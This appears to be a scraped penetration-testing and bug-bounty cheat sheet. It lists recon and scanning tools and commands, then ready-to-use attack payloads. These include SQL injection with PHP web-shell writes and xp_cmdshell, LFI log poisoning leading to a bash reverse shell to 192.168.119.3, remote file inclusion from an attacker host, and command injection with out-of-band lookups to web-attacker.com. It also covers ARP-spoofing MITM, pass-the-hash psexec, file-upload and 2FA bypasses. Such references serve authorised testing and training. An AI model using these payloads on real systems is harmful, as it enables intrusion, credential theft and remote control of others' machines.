- Vulnerability Rating Taxonomy
- CVSS Calculator
- PwnDoc
- Vulnrepo
- PlexTrac
- Offensive Security Exam Report Template in Markdown
Misc tools
- URL Decoder/Encoder
- base64encode.org
- Down or not
- DigitalOcean See Setting Up Your Ubuntu Box for Pentest and Bug Bounty Automation
- Exploit Database
- USB Rubber Ducky
- Flipper Zero
- Create a random text file
- BruteSpray
python brutespray.py --file nmap.xml --threads 5 --hosts 5
- BadSecrets a library and command line tool for finding secrets
- Proxyman to view requests from the app on your computer
- filesec.io
- malapi.io
- lots-project.com
- lolbas-project.github.io
- gtfobins.github.io
- loldrivers.io
- WAF Bypass Tool
- Forensia
- peepdf - PDF Analysis Tool
- Target validation
- Search for email addresses of employees
- What's the format? Does it change for founders, chief officers etc.?
- Search for corporate social media accounts
- Use whois
whois targetcorp.com
- Google Dorking
- Start searching for PHP files and directory listing
- Search for any company acquisitions of the target
- See also Content Discovery
- See each section of this chapter
- Use
WHOIS
,nslookup
anddnsrecon
- searchdns.netcraft.com
- Search for registration information and site technology entries
- Recon-ng
-
marketplace search github Search the Marketplace for GitHub modules marketplace info recon/domains-hosts/google_site_web Get information on a module marketplace install recon/domains-hosts/google_site_web Install a module modules load recon/domains-hosts/google_site_web Load a module info Get infos about module loaded options set SOURCE targetcorp.com Set a source run Run a module back Get back to default show Show the results; hosts, companies, leaks etc.
- Use
recon/domains-hosts/google_site_web
combined withrecon/hosts-hosts/resolve
-
- Passively search for information in open-source projects and online code repositories.
- Shodan
hostname:targetcorp.com Search for TargetCorp’s domain hostname:targetcorp.com port:'22' Search for TargetCorp’s domain running SSH
- Security Headers Scanner
- SSL Server Test
- DMARC Inspector
Note: A company may only approve tests of its own systems. Personal devices, outside email, and social media accounts used by employees often do not come under this authorisation.
- theHarvester
theharvester -d targetcorp.com -b google -d specify target domain, -b set data source to search
- hunter.io
- Phonebook.cz
- voilanorbert.com
- Clearbit
Verify email addresses
Malicious hackers frequently post stolen passwords on Pastebin or other less reputable websites. This is useful for generating wordlists.
- An example: rockyou.txt
Search for any acquisitions by the target
host command
host www.targetcorp.com Find the A host record
host -t mx www.targetcorp.com Find the MX record
host -t txt www.targetcorp.com Find the TXT record
host -l <domain name> <dns server address> Perform a DNS zone transfer; -l: list zone
Brute force forward DNS name lookups using a list like possible_subs.txt
containing common hostnames (see SecLists):
for ip in $(cat possible_subs.txt); do host $ip.megacorpone.com; done
Brute force reverse DNS names
for ip in $(seq 50 100); do host 38.100.193.$ip; done | grep -v "not found"
Tools
- DNSRecon
dnsrecon -d zonetransfer.com -t axfr Perform a zone transfer; -t: specify the type of enumeration to perform dnsrecon -d zonetransfer.com -D ~/list.txt -t brt Brute forcing hostnames
- DNSenum
dnsenum zonetransfer.me Perform a zone transfer
- Wappalyzer
- WhatWeb
- BuiltWith
nc -nvv -w 1 -z <IP> <PORT-RANGE> Use netcat to perform a TCP port scan
nc -nv -u -z -w 1 <IP> <PORT-RANGE> Use netcat to perform an UDP port scan
nmap <IP> Simple nmap scan
nmap -p 1-65535 <IP> Scan all the ports
nmap -sS <IP> Stealth / SYN Scanning (will not appear in any application logs)
nmap -sT <IP> TCP connect scan
nmap -sU <IP> UDP scan
nmap -sS -sU <IP> Perform a combined UDP and SYN scan
nmap -sn <IP> Perform a network sweep
nmap -p 1-65535 -sV -T4 -Pn -n -vv -iL target.txt -oX out.xml Discover everything including running services using a list of targets
nmap -sn <net_address_in_cdr> Check hosts alive, adding -A you gather more info for a target
nmap -sT -A <IP-range> Banner grabbing and/or service enumeration
nmap -sT -A --top-ports=20 <IP-range> -oG top-port-sweep.txt Perform a top twenty port scan, save the output in greppable format
nmap -O <IP> OS fingerprinting
nmap -sV -sT -A <IP> Banner Grabbing, Service Enumeration
Find live hosts
---------------
nmap -v -sn <IP-range> -oG ping-sweep.txt
grep Up ping-sweep.txt | cut -d " " -f 2
Find web servers using port 80
------------------------------
nmap -p 80 <IP-range> -oG web-sweep.txt
grep open web-sweep.txt | cut -d " " -f 2
Nmap Scripting Engine (NSE)
---------------------------
nmap --script-help dns-zone-transfer View information about a script, in this case "dns-zone-transfer"
nmap <IP> --script=smb-os-discovery OS fingerprinting (SMB services)
nmap --script=dns-zone-transfer -p 53 ns2.zonetransfer.com Perform a DNS zone transfer
nmap --script http-headers <IP> OS fingerprinting (HTTP supported headers)
nmap --script http-title <IP>
Other usages
------------
nmap -vvv -A --reason --script="+(safe or default) and not broadcat -p - <IP>"
masscan -p80 10.0.0.0/8 Look for all web servers using port 80 within a class A subnet
masscan -p80 10.11.1.0/24 --rate=1000 -e tap0 --router-ip 10.11.0.1 --rate specify the desired rate of packet transmission
-e specify the raw network interface to use
--router-ip specify the IP address for the appropriate gateway
- httprobe designed to find web servers
type subs.txt | httprobe -p http:81 -p http:3000 -p https:3000 -p http:3001 -p https:3001 -p http:8000 -p http:8080 -p https:8443 -c 150 > out.txt
- naabu a fast port scanner
- A simple usage using a list of subdomains:
naabu -v -list subs.txt -stats -o out.txt
- Discover everything faster, excluding some ports maybe already checked:
naabu -l 1.txt -v -p - -exclude-ports 80,443,81,3000,3001,8000,8080,8443 -c 1000 -rate 7000 -stats -o 1_o.txt
- A simple usage using a list of subdomains:
- Powershell
- SMB port scanning
Test-NetConnection -Port 445 <IP>
1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("<IP>", $_)) "TCP port $_ is open"} 2>$null
- SMB port scanning
- nmapAutomator
Resources
- smbclient
- CrackMapExec
crackmapexec smb <IP> -u usernames.txt -p passwords.txt --continue-on-success
crackmapexec smb <IP> -u <user> -p <password> --shares
- "A Little Guide to SMB Enumeration"
Enumerate SMB Shares
smbclient
---------
smbclient -L <IP> see which shares are available
smbclient //<IP>/<share> connect to the SMB share
smbclient -p <port> -L //<IP>/ -U <username> --password=<password> connect to the SMB share
get <file> get files
net
---
net view \\<IP> /All see which shares are available
net use \\<IP>\<share> connect to the SMB share
copy \\<IP>\<share>\<file> get files
Use nmap to scan for the NetBIOS service
nmap -v -p 139,445 -oG smb.txt 10.11.1.1-254
Use nbtscan to collect additional NetBIOS information
sudo nbtscan -r 10.11.1.0/24
Find various nmap SMB NSE scripts
ls -1 /usr/share/nmap/scripts/smb*
Example: nmap -v -p 139, 445 --script=smb-os-discovery <IP>
Determining whether a host is vulnerable to the MS08_067 vulnerability
nmap -v -p 139,445 --script=smb-vuln-ms08-067 --script-args=unsafe=1 <IP>
Note: the script parameter unsafe=1
, the scripts that will run are almost guaranteed to crash a vulnerable system
General notes
- Remember that you can transfer files to the share with
copy <file> \\<IP>\share
- Also when using
sudo impacket-smbserver -smb2support share .
- Also when using
Find and identify hosts that have portmapper/rpcbind running using nmap
nmap -v -p 111 10.11.1.1-254
Query rpcbind in order to get registered services
nmap -sV -p 111 --script=rpcinfo 10.11.1.1-254
Nmap NFS NSE Scripts
ls -1 /usr/share/nmap/scripts/nfs*
Run all these scripts with nmap -p 111 --script nfs* <IP>
Example of entire /home directory shared
Mount the directory and access the NFS share
--------------------------------------------
mkdir home
sudo mount -o nolock <IP>:/home ~/home/
cd home/ && ls
Add a local user
----------------
sudo adduser pwn Add the new user "pwn"
sudo sed -i -e 's/1001/1014/g' /etc/passwd Change the sed of the "pwn" user
cat /etc/passwd | grep pwn Verify that the changes have been made
Interesting commands
VRFY
request asks the server to verify an email addressEXPN
asks the server for the membership of a mailing list- Use telnet to connect to the target to gather information
telnet <IP> 25
- Port scanning with Powershell
Test-NetConnection -Port 25 <IP>
Use nc to validate SMTP users
nc -nv <IP> 25
Use nmap for SMTP enumeration
nmap -p 25 --script=smtp-enum-users <IP>
Use nmap to perform a SNMP scan
sudo nmap -sU --open -p 161 <IP-range> -oG open-snmp.txt
Use onesixtyone to brute force community strings
- Build a text file containing community strings
echo public > community echo private >> community echo manager >> community
- Build a text file containing IP addresses to scan
for ip in $(seq 1 254); do echo 192.168.45.$ip; done > ips
- Use onesixtyone
onesixtyone -c community -i ips
Note: Provided we at least know the SNMP read-only community string (in most cases is "public")
Use snmpwalk to enumerate
- The entire MIB tree:
snmpwalk -c public -v1 -t 10 <IP>
-c
: specify the community string-v
: specify the SNMP version number-t 10
to increase the timeout period to 10 seconds
- Windows users:
snmpwalk -c public -v1 <IP> 1.3.6.1.4.1.77.1.2.25
- Windows processes:
snmpwalk -c public -v1 <IP> 1.3.6.1.2.1.25.4.2.1.2
- Installed software:
snmpwalk -c public -v1 <IP> 1.3.6.1.2.1.25.6.3.1.2
- httprobe
- example:
cat subdomains.txt | httprobe -p http:81 -p http:3000 -p https:3000 -p http:3001 -p https:3001 -p http:8000 -p http:8080 -p https:8443 -c 150 > output.txt
- example:
- naabu + httprobe, to find hidden web ports
- example
naabu -v -list subdomains.txt -exclude-ports 80,443,81,3000,3001,8000,8080,8443 -c 1000 -rate 7000 -stats -o naabu.txt cat naabu.txt | httprobe > results.txt
- example
- Port
22
, connect withssh <ip>
,ssh <ip> -oKexAlgorithms=+<option>
, ``ssh -oKexAlgorithms=+-c <cipher>
- PuTTY
- Search for a banner, to get more info
Some tips
- If the application is ASP.NET, search for
Appsettings.json
- Use recursion. If you encounter a
401
response, search with waybackmachine - Search for past reports in the same program
Check the tech of a target with
- Wappalyzer
- Webanalyze Port of Wappalyzer for command line
./webanalyze -host example.com -crawl 1
- Shodan for Chrome and for Firefox
Tools
- feroxbuster
feroxbuster -u https://example.com/ --proxy http://127.0.0.1:8080 -k -w wordlist.txt -s 200,403
- dirsearch
dirsearch -l list.txt -x 404,500,501,502,503 -e *
dirsearch -u target.io -x 404,500,501,502,503 -e *
dirsearch -u <target> -w /usr/share/seclists/Discovery/Web-Content/big.txt -r -R 2 --full-url -t 75 --suffix=.php
- DIRB
dirb http://www.target.com -r -z 10
- changedetection.io
- ffuf
ffuf -u 'http://<IP>/secret/evil.php?FUZZ=/etc/passwd' -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -fs 0
Crawling
- gospider
gospider -s target -c 10 -d 4 -t 20 --sitemap --other-source -p http://localhost:8080 --cookie "0=1" --blacklist ".(svg|png|gif|ico|jpg|jpeg|bpm|mp3|mp4|ttf|woff|ttf2|woff2|eot|eot2|swf|swf2|css)"
- hakrawler
cat target.txt | hakrawler -u -insecure -t 20 -proxy http://localhost:8080 -h "Cookie: 0=1"
- Katana
katana -u target -jc -kf -aff -proxy http://127.0.0.1:8080 -H "Cookie: 0=1"
Wordlists
To find more endpoints
- Apkleak to get endpoints from an apk
- Source2Url to get endpoints from a source code
- waymore more results from the Wayback Machine
- BurpJSLinkFinder
- trashcompactor to remove URLs with duplicate funcionality based on script resources included
ext:
search for: php, php3, aspx, asp, jsp, xhtml, phtml, html, xsp, nsf, form, swffiletype:
search for filetypes like html or php-filetype:html
omit filetypehtml
- Search also for pdf, xlsx, bak and similar, they may contain some infos
site:
to target a website and its subdomainsinurl:&
to search for parametersintitle:
to search interesting pages like admin, register, login etc."Seeing something unexpected? Take a look at the GitHub profile guide." "COMPANY-TARGET" site:http://github.com
[Reference]intext:"© copyright COMPANY YEAR"
[Reference]site:target.com intext:login intext:username intext:password
- Exposed .git
intext:"index of /.git" "parent directory"
- Search for s3 buckets
site:.s3.amazonaws.com "COMPANY"
- Find CVEs, like CVE-2019-9647
intext:"Powered by Gila CMS"
- Errors
site:target.com intext:"Warning: mysql_num_rows()"
intitle:"Index of /" + ".htaccess"
intitle:"index of" "parent directory"
directory listing- Google Dorks - Cloud Storage:
site:http://s3.amazonaws.com "target.com" site:http://blob.core.windows.net "target.com" site:http://googleapis.com "target.com" site:http://drive.google.com "target.com"
- Google Hacking Database
- DorkSearch.com
- Refine web searches | Google
- sensitive words:
password, api_key, access_key, dbpassword, dbuser, pwd, pwds, aws_access, key, token, credentials, pass, pwd, passwd, private, preprod, appsecret
- languages:
json, bash, shell, java etc.
, exampleHEROKU_API_KEY language:json
- extensions:
extensions: bat, config, ini, env etc.
- filename:
netrpc, .git-credentials, .history, .htpasswd, bash_history
, examplefilename:users
- Other dorks
hostname:targetcorp.com
Search for TargetCorp’s domainhostname:targetcorp.com port:'22'
Search for TargetCorp’s domain running SSH
Tools
- Echo Mirage
- Wireshark
- PCredz
- Impacket
impacket-mssqlclient <user>:<password>@<IP> -windows-auth
impacket-psexec -hashes 00000000000000000000000000000000:<NTLM> <USERNAME>@<IP>
impacket-psexec <USERNAME>:<PASSWORD>@<IP>
- putty
- MobaXterm
- proxychains
- Samba suite
- Enum
- Winfo
- enum4linux
- macchanger
ip route on Linux box
route print on Windows
netstat -r on Mac OSX
ip addr on Linux
ipconfig /all on Windows
ifconfig on MacOS
netstat -ano on Windows
netstat -tunp on Linux
on MacOS
--------
netstat -p tcp -p udp
lsof -n -i4TCP -i4UDP
ip route add <net_address_in_cdr> via <interface_gateway> on Linux
route add <net_address_in_cdr> mask <net_address_mask_in_cdr> <interface_gateway> on Windows
nmap -sn <net_address_in_cdr> Check hosts alive, adding -A you gather more info for a target
Windows
-------
nbtstat /? help command
nbtstat -A <Target-IP> display information about a target
NET VIEW <Target-IP> enumerate the shares of a target
NET USE \\<Target-IP>\IPC$ '' /u:'' connect to a window share; connect to 'IPC$' share by using empty username and password
Linux
-----
nmblookup -A <Target-IP> same as nbtstat for Linux; display information about a target
smbclient -L //<Target-IP> -N access Windows shares
smbclient //<Target-IP>/IPC$ -N connect to a window share; connect to 'IPC$' share by using empty username and password
Enum
----
enum -s <Target-IP> enumerate the shares of a machine
enum -U <Target-IP> enumerate the users of a machine
enum -P <Target-IP> check the password policy of a machine
Winfo
-----
winfo <Target-IP> -n use winfo with null session
ip addr query available network interfaces
ip route enumerate network routes
for i in $(seq 1 254); do nc -zv -w 1 <octet>.<octet>.<octet>.$i <port>; done bash loop with Netcat to sweep for port <PORT> in a subnet
tracert <target>
shows details about the path that a packet takes from the device sender to the target destination specifiedfor ip in $(echo '<IP>'); do ping -c 5 $ip; traceroute $ip; echo '\nnslookup'; nslookup $ip; done
ip neighbour on Linux
apr -a on Windows
arp on *nix OS
- The goal is to (1) trick the victim to save in the ARP Cache my MAC address (the attacker) associated it with the router IP and (2) the router to send the traffic back to you, this to perform a MITM
- First, enable the Linux Kernel IP Forwarding to transform a Linux Box into a router
echo 1 > /proc/sys/net/ipv4/ip_forward
- Run arpspoof
arpspoof -i <interface> -t <target> -r <host>
- Check also Ettercap
An example
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.4.11 -r 192.168.4.16
Service | Port |
---|---|
SMTP | 25 |
SSH | 22 |
POP3 | 110 |
IMAP | 143 |
HTTP | 80 |
HTTPS | 443 |
NETBIOS | 137, 138, 139 |
SFTP | 115 |
Telnet | 23 |
FTP | 21 |
RDP | 3389 |
MySQL | 3306 |
MS SQL Server | 1433 |
Confluence | 8090 |
See : "Open Port Vulnerabilities List by Dirk Schrader"
Ports | Vulnerabilities |
---|---|
20, 21 (FTP) | - Brute-forcing - Anonymous authentication ( anonymous as username and password) - Cross-site scripting - Directory traversal attacks |
22 (SSH) | - leaked SSH keys - Brute-forcing |
23 (Telnet) | - Brute-forcing - Spoofing -Credential sniffing |
25 (SMTP) | - Spoofing - Spamming |
53 (DNS) | - DDoS |
137, 139 (NetBIOS over TCP) 445 (SMB) | - EternalBlue - Capturing NTLM hashes - Brute-force |
80, 443, 8080 and 8443 (HTTP and HTTPS) | - Cross-site Scripting (XSS) - SQL injections - Cross-Site Request Forgeries (CSRF) - DDoS |
1433,1434 and 3306 (SQL Server and MySQL) | - Default configurations - DDoS |
3389 (Remote Desktop) | - BlueKeep - Leaked or weak user authentication |
8090 (Confluence) | CVE-2022-26134 |
- Search for known dangerous functions used on user-supplied input
- example,
eval(
can cause command injection without proper sanitization
- example,
- Search for hardcoded credentials such as API keys, encryption keys and database passwords
- many API keys start with the same format (ex. AWS keys usually start with
AKIA
), search for patterns from ServletTarPit.java, Tarpit Java
- many API keys start with the same format (ex. AWS keys usually start with
- Search for weak cryptography or hashing algorithms
- Search for outdated dependencies
- Search for revealing comments
Digging deeeper
- Prioritize functions like authentication, autorization, PII etc.
- example: disclosing PII in the logs, from OrderStatus.java
- example: SQL injection in OrderStatus.java
- Follow any code that deals with user input
Automation
- Use SAST tools
- Use SCA tools
- Use secret scanners
- Then test the results manually
Resources
- How to Analyze Code for Vulnerabilities
- OWASP Code Review Guide
- Tarpit Java
- TruffleHog
- GitLeaks
- Visual Studio Code for Source Code Analysis
- beautifier.io for JavaScript Analysis
Run Nessus and navigate to http://localhost:8834
Defining targets
Top-right, click "New Scan"
- Basic Network Scan: general scan containing a number of tests that may be used against different target types
- Arguments: a name for the scan and a list of targets (an IP address, an IP range, or comma-delimited FQDN or IP list)
- Credentialed Patch Audit: authenticated scan that enumerates missing patches
- Web Application Tests: specialized scan for locating published Web application security vulnerabilities
- Spectre and Meltdown: targeted scan for Meltdown and Spectre vulnerabilities
Configuring scan definitions
- Ports to scan
- In "Discovery" > "Scan Type" you can change the ports to scan
- "Discovery" > "Port Scanning" to select more specific options
- Turn off Host discovery (save time and scan more quietly)
- "Discovery" > "Host Discovery" under the "Settings" tab > deselect "Ping the remote host"
Authenticated scanning
From a new scan, click in the "Credentials" tab.
Scanning with Individual Nessus Plugins
From the "Plugins tab" you can select multiple options (a family of plugin) in the left column or one by one in the right column.
NSE scripts can be found in the /usr/share/nmap/scripts/
directory. Here you can find script.db
, a file that serves as an index to all of the scripts.
- Check also: CVE-2021-41773 NSE Script
sudo nmap -sV -p 443 --script "http-vuln-cve2021-41773" <IP>
How to add new scripts
- Copy the file in
/usr/share/nmap/scripts/
sudo nmap --script-updatedb
Grep for scripts in the "vuln" and "exploit" categories
cat script.db | grep '"vuln"\|"exploit"'
Using NSE's "vuln" scripts
sudo nmap --script vuln <IP>
You can find it here: sullo/nikto.
An example of usage
nikto -host=http://www.targetcorp.com -maxtime=30s
You can find it here: projectdiscovery/nuclei. See also: "The Ultimate Guide to Finding Bugs With Nuclei by ProjectDiscovery"
Automatic Selection
nuclei -u http://target.io -as
Check for Technologies
%USERPROFILE%\nuclei-templates\technologies
Check for more: misconfiguration, CVEs and CNVD
-t %USERPROFILE%\nuclei-templates\misconfiguration -t %USERPROFILE%\nuclei-templates\cves -t %USERPROFILE%\nuclei-templates\cnvd
Use it in a workflow
cat subdomains.txt | httpx | nuclei -t technologies
Use tags combined with automatic selection
nuclei -l list.txt -as -tags log4j -o output.txt
Check for: takeovers, .git exposed, crlf-injection, swaggers, exposed panels and old copyrights
nuclei -l target.txt -t %USERPROFILE%/nuclei-templates/takeovers -t %USERPROFILE%/nuclei-templates/exposures/configs/git-config.yaml -t %USERPROFILE%/nuclei-templates/vulnerabilities/generic/crlf-injection.yaml -t %USERPROFILE%/nuclei-templates/exposures/apis/swagger-api.yaml -t %USERPROFILE%/nuclei-templates/exposed-panels -t %USERPROFILE%/nuclei-templates/miscellaneous/old-copyright.yaml -stats -o output/nuclei_target
Check for log4j
nuclei -l target.txt -as -tags log4j,cve -stats -o output/nuclei_2_target
Tools
- SQL injection cheat sheet | PortSwigger
- SQL Injection cheat sheets | pentestmonkey
- sqlmapproject/sqlmap
- Ghauri
MySQL
mysql -u root -p'root' -h <IP> -P 3306
connect to the databaseselect version();
retrieve the db versionselect system_user();
inspecting the current session's usershow databases;
list all available databasesUSE databasetmp
use thedatabasetmp
databaseSHOW TABLES
SELECT user, authentication_string FROM mysql.user WHERE user = 'rooter';
inspect userrooter
's encrypted password
MSSQL
impacket-mssqlclient <user>:<password>@<IP> -windows-auth
connect to remote instance via ImpacketSELECT @@version;
retrieve the db versionSELECT name FROM sys.databases;
list all available databasesSELECT * FROM tempdb.information_schema.tables;
inspect the available tables in thetempdb
databaseSELECT * from tempdb.dbo.users;
How to identify SQL injections
- Search for SQL errors, use the apex or the backtick character in parameters and analyze the response.
Error-based payloads
- Try to generate an error using characters like
'
or the backtick - Try this payload
' OR 1=1 -- //
UNION-based payloads
' ORDER BY <NUMBER>-- //
Verify the exact number of columns- increment the
<NUMBER>
value from1
to..
until you reach an error likeUnknown column '7' in 'table'
- check this
- increment the
' UNION SELECT database(), user(), @@version, null, null -- //
enumerate the database via SQL UNION Injection- use
null
to have the correct number of columns
- use
Blind SQL injections detection
-
0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
-
0'|(IF((now())LIKE(sysdate()),SLEEP(1),0))|'Z
-
0'or(now()=sysdate()&&SLEEP(1))or'Z
Extract database information
- Extract the version:
?id=1 union all select 1, 2, @@version
- Extract the database user:
?id=1 union all select 1, 2, user()
- Extract table names:
?id=1 union all select 1, 2, table_name from information_schema.tables
- Extract table columns
?id=1 union all select 1, 2, column_name from information_schema.columns where table_name='users'
- An example of extracting the
users
table:?id=1 union all select 1, username, password from users
Authentication Bypass
tom’ or 1=1 LIMIT 1;#
#
is a comment marker in MySQL/MariaDBLIMIT 1
is to return a fixed number of columns and avoid errors when our payload is returning multiple rows
Insert a new user
insert into webappdb.users(password, username) VALUES ("backdoor","backdoor");
Local File Inclusion (LFI)
Using the load_file
function: ?id=1 union all select 1, 2, load_file('C:/Windows/System32/drivers/etc/hosts')
Remote Code Execution (RCE)
-
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; xp_cmdshell 'COMMAND';
-
EXEC sp_configure 'allow updates', 0 RECONFIGURE EXEC sp_configure 'show advanced options', 1 GO RECONFIGURE GO EXEC sp_configure 'xp_cmdshell', 1 GO RECONFIGURE GO xp_cmdshell 'COMMAND';
- Write a PHP shell using the
OUTFILE
function:?id=1 union all select 1, 2, "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE 'c:/xampp/htdocs/backdoor.php'
. Then accessbackdoor.php&cmd=ipconfig
.
sqlmap
-
> SQLMap: sqlmap -u https://vulnerable/index.php?id=1 -l (to parse a Burp log file) --parse-errors --current-db --invalid-logical --invalid-bignum --invalid-string --risk 3 --force-ssl --threads 5 --level 1 --risk 1 --tamper=space2comment
sqlmap -u http://victim/page.php?param=1 -p param
test the parameterparam
sqlmap -u http://victim/page.php?param=1 -p param --dump
dump the entire database- Add
-D DATABASE_NAME
and-T TABLE_NAME
to dump a specific database/table
sqlmap -r request.txt -p param --os-shell
gain shellsqlmap -u http://vulnerable.com --forms --crawl=10 --level=5 --risk=3
to crawlsqlmap -u http://vulnerable.com --batch
non interactive mode
How to fix SQL injections: Use parameterized queries/prepared statements to protect against SQL injections by isolating user input from SQL code. They add placeholders for user input in SQL statements, creating a layer of isolation and preventing user input from affecting SQL code.
Multi-factor authentication
- Response manipulation, try to intercept the response and modify the status to
200
- Status code manipulation, change the code from
4xx
to200
- 2FA code leakage in the response
- JS File Analysis
- 2FA Code Reusability
- Lack of Bruteforce protection
- The 2FA code can be used for any user
- CSRF on 2FA disabling
- Password reset disable 2FA
- Bypass 2FA with null or
000000
- Access the content directly
- Login with Oauth to bypass 2FA
- If you get logged-out after failed attempts, use macros with Burp
Password reset
- Change the
Host
with the host of your server. The request for a password reset might use theHost
value for the link with the reset token - Try with headers like
X-Forwarded-Host:
- Via dangling markup
Host: victim.com:'<a href="//attacker.com/?
- Insert two emails, like:
Rate-limit
- Bypass with
X-Forwarded-For:127.0.0.1-1000
- IP rotating, you can use
- Log in into a valid account to reset the rate-limit
Web Cache Deception
- Attacker send to a victim a 404 endpoint like
site.com/dir/ok.css
- Victim click on it, the CDN cache the page
- Attacker goes to
site.com/dir/ok.css
, now it can see the page of the Victim
Misc tests
- Password change
- Keeping users logged in
- Test "remember me" functionality
- PHP protections can be bypassed with
[]
, likepassword=123
topassword[]=123
- Replace password with a list of candidates, example
"username":"usertest" "password":[ "123456", "password", "qwerty", ...
- Search for Open Redirect in login and register
- For phpMyAdmin, check default credential
root
and blank password
Directory traversal vulnerabilities allow an attacker to read local secret files. To identify these vulnerabilities, you can search for file extensions in URL query strings and common vulnerable parameters like file
, path
and folder
(see scripts/fg.rb)
Exploitations / Bypasses
- simple case
https://insecure-website.com/loadImage?filename=..\..\..\windows\win.ini
- absolute path
https://insecure-website.com/loadImage?filename=/etc/passwd
- stripped non-recursively
https://insecure-website.com/loadImage?filename=....//....//....//etc/passwd
- superfluous URL-decode
https://insecure-website.com/loadImage?filename=..%252f..%252f..%252fetc/passwd
- validation of start of path
https://insecure-website.com/loadImage?filename=/var/www/images/../../../etc/passwd
- validation of start of path
https://insecure-website.com/loadImage?filename=../../../etc/passwd%00.png
Search for
windows\win.ini
c:\windows\system32\drivers\etc\hosts
etc/passwd
File inclusion vulnerabilities allow an attacker to include a file into the application’s running code. To identify these vulnerabilities, you can search for file extensions in URL query strings and common vulnerable parameters like file
, path
and folder
(see scripts/fg.rb).
Local File Inclusion (LFI): execute a local file. An example: Apache's access.log contamination
- Once found a LFI, read the Apache's access.log
http://victim.com/page.php?file=<PAYLOAD>
- Use
C:\xampp\apache\logs\access.log
or../../../../../../../../../var/log/apache2/access.log
- Use
- Notice which values from requests are saved. Contaminate Apache logs by sending this payload
<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>
in the User-Agent - Execute a RCE with
http://victim.com/page.php?file=<apache/access.log>&cmd=ipconfig
. It will load the contaminated logs and perform an RCE thanks toshell_exec($_GET['cmd'])
- Run a reverse shell using a listener
nc -nvlp 4444
and in&cmd
usebash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.119.3%2F4444%200%3E%261%22
Remote File Inclusion (RFI): execute a remote file
- An example:
http://<VICTIM>/menu.php?file=http://<ATTACKER>/evil.php
PHP Wrappers
?file=data:text/plain,hello world
?file=data:text/plain,<?php echo shell_exec("dir") ?>
?file=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls
- Use the command
curl http://victim.com/index.php?page=php://filter/convert.base64-encode/resource=admin.php
to obtain the source code ofadmin.php
encoded in base64. This is to not run the PHP and to fetch the source code- Some examples for
php://
: PHP: php:// - Manual
- Some examples for
- Other wrappers
To search
/var/log/apache2/access.log
/etc/passwd
/etc/shadow
Let's say that the vulnerable endpoint it's https://insecure-website.com/stockStatus?productID=381&storeID=29
. The provide the stock information, the application runs the command stockpile.pl 381 29
. If there is no OS Command Injection protection, by inserting the payload & echo abcdefg &
in productID
it's possible to execute the command echo
.
For blind OS Command Injections
- Time delay
& ping -c 10 127.0.0.1 &
- Redirecting output
& whoami > /var/www/static/whoami.txt &
- Out-of-band (OAST) techniques
& nslookup kgji2ohoyw.web-attacker.com &
Ways of injecting OS commands
- Both Windows and Unix-based systems
&
&&
|
||
- Unix-based systems only
;
- Newline with
0x0a
or\n
injected command
$(injected command)
Resource
Examples
- Excessive trust in client-side controls
- 2FA broken logic
- Failing to handle unconventional input
- Inconsistent security controls
- Weak isolation on dual-use endpoint
- Password reset broken logic
- Insufficient workflow validation
- Flawed enforcement of business rules
- Authentication bypass via encryption oracle
- Account Takeover via type confusion
- Play with parameters and flags to see if you can achieve ATO
What is information disclosure?
- Data about other users, such as usernames or financial information
- Sensitive commercial or business data
- Technical details about the website and its infrastructure
What are some examples of information disclosure?
- Revealing the names of hidden directories, their structure, and their contents via a robots.txt file or directory listing
- Providing access to source code files via temporary backups
- Explicitly mentioning database table or column names in error messages
- Unnecessarily exposing highly sensitive information, such as credit card details
- Hard-coding API keys, IP addresses, database credentials, and so on in the source code
- Hinting at the existence or absence of resources, usernames, and so on via subtle differences in application behavior
- If you need to find UUID from an email, try to register the user and see if in the response it's disclosed. [Reference]
How do information disclosure vulnerabilities arise?
- Failure to remove internal content from public content
- Insecure configuration of the website and related technologies
- Flawed design and behavior of the application
In the context of web applications, access control is dependent on authentication and session management:
- Authentication identifies the user and confirms that they are who they say they are;
- Session management identifies which subsequent HTTP requests are being made by that same user;
- Access control determines whether the user is allowed to carry out the action that they are attempting to perform.
From a user perspective, access controls can be divided into the following categories:
- Vertical access controls Mechanisms that restrict access to sensitive functionality that is not available to other types of users
- Horizontal access controls Mechanisms that restrict access to resources to the users who are specifically allowed to access those resources
- Context-dependent access controls Restrict access to functionality and resources based upon the state of the application or the user's interaction with it
Tools
- Autorize
- Authz
- UUID Detector
- Check also endpoints in JS files
Upload Functions check-list
- Check if the method
PUT
is enabled - Integrations (from 3rd party)
- XSS
- Self Uploads
- XML based (Docs/PDF)
- SSRF, XSS
- Image
- XSS, Shell
- Name
- Binary header
- Metadata
- XSS, Shell
- XML based (Docs/PDF)
- Where is data stored?
Extension Splitting
- shell.php%00.png
- shell.php%0A.png
- shell.php\n.png
- shell.php\u000a.png
- shell.php\u560a.png
- shell.php%E5%98%8A.png
- shell.php;.png
- shell.php%3B.png
- shell.php\u003b.png
- shell.php\u563b.png
- shell.php%E5%98%BB.png
multipart/form-data POST request
POST / HTTP/2
Host: example.io
Content-Type: multipart/form-data; boundary=---------------------------374598703146120535182333328
Content-Length: 342
-----------------------------374598703146120535182333328
Content-Disposition: form-data; name="key"
general
-----------------------------374598703146120535182333328
Content-Disposition: form-data; name="file"; filename="file.pdf"
Content-Type: application/pdf
$content$
-----------------------------374598703146120535182333328--
Add magic bytes
Add magic bytes at the beginning of a file to bypass restrictions
echo '89 50 4E 47 0D 0A 1A 0A' | xxd -p -r >> reverse.php.png
cat reverse.php >> reverse.php.png
- Useful, for example, to upload
.js
files and bypass CSP restrictions
General tips
- If the target creates an encrypter URL for your file, copy the domain and use the command
echo data.target.com | waybackurls | httpx -mc 200, 403
. If you find valid endpoints, it might be possible to have an information disclosure [Reference]
Resources
- Common MIME types
- ASHX shell, see mert's tweet
- How I earned $500 by uploading a file: write-up of one of my first bug bounty
- See the shells here
SSRF with blacklist-based input filters bypass
Some applications block input containing hostnames like 127.0.0.1
and localhost, or sensitive URLs like /admin
